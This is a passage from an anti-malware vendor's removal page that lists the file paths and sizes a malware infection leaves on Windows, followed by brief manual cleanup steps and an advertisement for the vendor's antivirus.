    %WinDir%\HpE\sys32\ndsqp.exe (106 bytes)
    %WinDir%\HpE\exec\traytp.txt (88420 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\oqgrsfe.txt (10177 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nagsjof.txt (601 bytes)
    %WinDir%\HpE\flist.bin (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ipobzxt.txt (4545 bytes)
    %System%\drivers\HideSys.sys (15 bytes)
    %System%\appmon.txt (263811 bytes)
    %System%\lhc.dat (185 bytes)
    %WinDir%\HpE\sys32\ndsqp.txt (17980 bytes)
    %WinDir%\Temp\AdbWinUsbApi.dll (60 bytes)
    %WinDir%\Temp\adbWinpi.dll (304 bytes)
    %WinDir%\Temp\Cattle.exe (3727 bytes)
    %WinDir%\Temp\AdbWinApi.dll (96 bytes)
    %WinDir%\Temp\TscServer.exe (1653 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\8LG56LOL\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\PYJT5JHI\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0HUL6ZQ7\desktop.ini (67 bytes)
    %System%\LQdhJ\yYJSx.exe (414 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P4IK7RMW\desktop.ini (67 bytes)
    %WinDir%\HpE\sys32\oK455Vp (13 bytes)
    %WinDir%\HpE\sys32\z7AQ9Ew.sys (22 bytes)
    %WinDir%\HpE\sys32\services.exe (3904 bytes)
    %WinDir%\HpE\exec\ico.ini (292 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\8LG56LOL\statbar[1].ini (152 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\traytp.lnk (640 bytes)
    %System%\v9pce8W (1629 bytes)
    %System%\weblog.log (349 bytes)
    %System%\gy17y1D.sys (22 bytes)

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now